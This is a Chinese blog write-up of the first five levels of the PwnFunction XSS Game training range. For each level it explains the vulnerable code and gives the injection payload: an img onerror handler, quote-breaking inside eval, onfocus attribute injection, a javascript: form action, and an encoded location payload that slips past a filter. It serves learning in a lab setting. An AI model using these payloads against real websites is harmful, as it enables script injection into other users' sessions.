XSS攻击

靶场地址:

XSS Game - Learning XSS Made Simple! | Created by PwnFunction

第一关:

源码

这是接收somebody的代码 只要有值就可以

思路以及解答

我们使用比较简单的img标签somebody=<img src=1 οnerrοr="alert(1337)">

第二关:

源码

这个把通过接收jeff的值(如果没有值则使用JEFFF代替)通过eval把jeff和Ma name连接 并在1秒后传给maname

尝试闭合

jeff=aaa";alert(1337);"

第三关

源码

用wey进行传参过滤掉<>但没有过滤双引号,可以执行onfocus

wey=aaaa" οnfοcus=alert(1337) autofocus="

第四关

源码

获取表单id两秒后自动提交 它允许用户通过 URL 参数动态设置表单提交的目标

ricardo=JavaScript:alert(1337)

第五关

源码 

正则表达式过滤掉字符串中的 (、\``、)和` 字符 虽然过滤了,因为 innerHTML 允许插入任意的 HTML 代码所以还是有危险

markassbrownlee=<img src=1 οnerrοr=location="javascript:alert%25281337%2529">

  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值